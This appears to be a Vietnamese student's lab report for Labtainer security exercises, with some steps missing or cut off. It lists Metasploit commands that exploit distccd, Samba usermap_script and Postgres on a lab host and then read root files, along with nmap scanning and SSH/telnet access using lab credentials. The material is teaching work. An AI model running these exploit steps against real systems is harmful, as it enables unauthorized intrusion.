Bài 1: Khai thác lỗ hổng dịch vụ sử dụng Metasploit
Bước 1: labtainer -r metasploit
Bước 2: ifconfig
Trang 2Bước 3: Kiểm tra kết nối bằng ping
Bước 4: Quét các dịch vụ có thể tấn công: nmap -p0-65535 192.168.1.2
Trang 3Bước 5: Khai thác dịch vụ cổng 513: rlogin -l root 192.168.1.2
Trang 4-Trên terminal gõ: “sudo msfconsole”
-Tìm và tấn công dịch vụ distccd: search distccd
-Sử dụng công cụ khai thác: use exploit/unix/misc/distcc_exec
Trang 5- Xem cấu hình liên quan đến exploit: options
- Đặt RHOST: set RHOST 192.168.1.2
Trang 6- Khai thác lỗ hổng: exploit
- Đọc file : cat /root/filetoview.txt
Trang 7Bước 8: Khai thác lỗ hổng IRC daemon (cổng 6667): Các bước thực hiện tương
Bước 10: Khai thác dịch vụ Samba service (cổng 139):
“sudo msfconsole” -> search usermap_script->
->set RHOST 192.168.1.2->exploit->cat /root/filetoview.txt
Bước 12: Khai thác dịch vụ Postgres (cổng 5432):
Trang 8“sudo msfconsole” -> search postgres_payload->use exploit/linux/postgres/postgres_payload->set RHOST 192.168.1.2->exploit
->cat /root/filetoview.txt
Bước 13: Kết thúc bài lab: stoplab metasploit
Bài 4: Phát hiện các lỗ hổng bảo mật sử dụng công cụ rà quétBước 1: Xác định IP của máy
Bước 2: Trên máy khách mycomputer sử dụng nmap để tìm ra địa chỉ IP của
Trang 9nmap để tìm cổng dịch vụ đang mở trên máy friedshrimp biết rằng cổng (port)
nằm từ 2000-3000.
Bước 3: Sau khi xác định được cổng ssh đang mở Sử dụng ssh để truy cập vào
máy chủ Tên máy chủ và mật khẩu là: ubuntu.
Trang 10Bước 4: Sau khi truy cập được vào máy chủ friedshrimp đi tìm file
friedshrimp.txt Mở và đọc file.
Bước 5: Kết thúc bài lab: stoplab nmap-discovery
Bài 9: Sử dụng công cụ truy cập từ xa
Trang 11Bước 1: Xác định IP của các máy
Bước 2: Trên máy khách sử dụng telnet để kết nối với máy chủ thông qua địa chỉ IP
Bước 3: Sau khi đăng nhập vào máy chủ, thực hiện việc đọc tệp có sẵn chứa đoạn mật mã
Trang 12Bước 4: Trên server, chạy tcpdump để hiển thị lưu lượng mạng TCP và Thực hiện ssh từ máy khách vào máy chủ và đọc dữ liệu trên máy chủ
Bước 5: Kết thúc bài lab: stoplab telnetlab